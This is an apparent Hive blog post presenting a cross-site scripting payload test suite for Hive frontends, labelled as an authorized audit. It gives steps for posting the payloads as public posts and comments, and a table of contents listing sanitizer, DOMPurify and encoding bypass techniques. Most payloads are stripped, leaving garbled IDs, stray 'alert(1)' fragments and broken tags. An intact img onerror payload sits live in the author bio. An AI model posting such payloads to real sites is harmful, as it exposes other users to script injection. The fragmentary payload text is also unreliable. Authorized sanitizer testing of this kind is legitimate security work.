Louis Random Audit avatar

XSS Payload Test Suite for Hive Frontends

louis.random

Published: 22 Mar 2026 › Updated: 22 Mar 2026XSS Payload Test Suite for Hive Frontends

XSS Payload Test Suite for Hive Frontends

XSS Payload Test Suite for Hive Frontends

  FOR AUTHORIZED TESTING ONLY
    Do not use against systems without explicit written permission.
    Report ID: AUDIT-20260322
    Auditor: louis88

Purpose: Post each payload as a Hive blockchain post body to test sanitization
across condenser and other Hive frontends. All payloads use alert(1) or
alert(document.domain) as a benign proof-of-concept indicator.

How to use: Each section contains payloads wrapped in markdown code fences
for reference, followed by the raw payload to copy. Test each payload as:

  1. A standalone post body
  2. Wrapped in <html>...</html> tags (triggers the raw HTML path in MarkdownViewer)
  3. Inside a markdown paragraph mixed with normal text
  4. As a comment on an existing post

Table of Contents

  1. Standard Vectors
  2. HTML Tag Event Handlers — Exhaustive
  3. SVG Vectors
  4. MathML Vectors
  5. HTML5 Semantic & Obscure Tags
  6. Encoding Bypass Vectors
  7. Unicode & Character Tricks
  8. CSS-Based Vectors
  9. Markdown-Specific Vectors
  10. Mutation XSS (mXSS)
  11. DOM Clobbering Chains
  12. Template & Framework-Specific
  13. Protocol Handler Abuse
  14. Meta & Base Tag Injection
  15. Form & Input Hijacking
  16. Object, Embed & Applet
  17. Media Elements
  18. Focus & Autofocus Chains
  19. Animation & Transition Events
  20. Content-Editable & Designmode
  21. Polyglot Payloads
  22. DOMPurify Specific Bypasses
  23. Condenser html-Wrapper Path
  24. Dangling Markup Injection
  25. Tab-Nabbing & Window Reference
  26. Exotic Attribute Vectors
  27. Regex Sanitizer Bypass Techniques
  28. Obfuscation & Evasion Techniques
  29. Payload Chaining & Multi-Stage

1. Standard Vectors

Classic payloads that every sanitizer should catch. If any of these fire, the sanitizer is fundamentally broken.

XSS-STD-001
alert(1)
XSS-STD-002
XSS-STD-003
alert(String.fromCharCode(72,105))
XSS-STD-004
alert(1)
XSS-STD-005
alert(1)
XSS-STD-006  Script with CDATA (XHTML context)
/**/
XSS-STD-007  Closing existing tag context

alert(1)

XSS-STD-008  Closing textarea context
alert(1)
XSS-STD-009  Closing noscript context

alert(1)

XSS-STD-010  Line breaks in tag

alert(1)</scr
ipt>


2. HTML Tag Event Handlers — Exhaustive

Comprehensive list of every HTML event handler attribute. Many sanitizers only block onerror and onload but miss obscure handlers.

2.1 Mouse Events

XSS-EVT-001

XSS-EVT-002
HOVER ME
XSS-EVT-003
HOVER ME
XSS-EVT-004
HOVER THEN LEAVE
XSS-EVT-005
CLICK ME
XSS-EVT-006
CLICK ME
XSS-EVT-007
MOVE OVER ME
XSS-EVT-008
LEAVE ME
XSS-EVT-009
CLICK ME
XSS-EVT-010
DOUBLE CLICK
XSS-EVT-011
RIGHT CLICK ME
XSS-EVT-012
SCROLL ON ME

2.2 Keyboard Events

XSS-EVT-013

XSS-EVT-014

XSS-EVT-015

2.3 Load / Lifecycle Events

XSS-EVT-016
XSS-EVT-017

XSS-EVT-018
XSS-EVT-019
XSS-EVT-020
XSS-EVT-021
XSS-EVT-022
XSS-EVT-023

XSS-EVT-024

XSS-EVT-025

Leave XSS Payload Test Suite for Hive Frontends to:

Written by

<img src=x onerror=alert('about-xss')> Test bio

Read more #test posts


Best Posts From Louis Random Audit

We have not curated any of louis.random's posts yet. But you can encourage our curation team to review posts by visiting them regularly and by referring other readers. Because we give priority to frequently read content.

More Posts From Louis Random Audit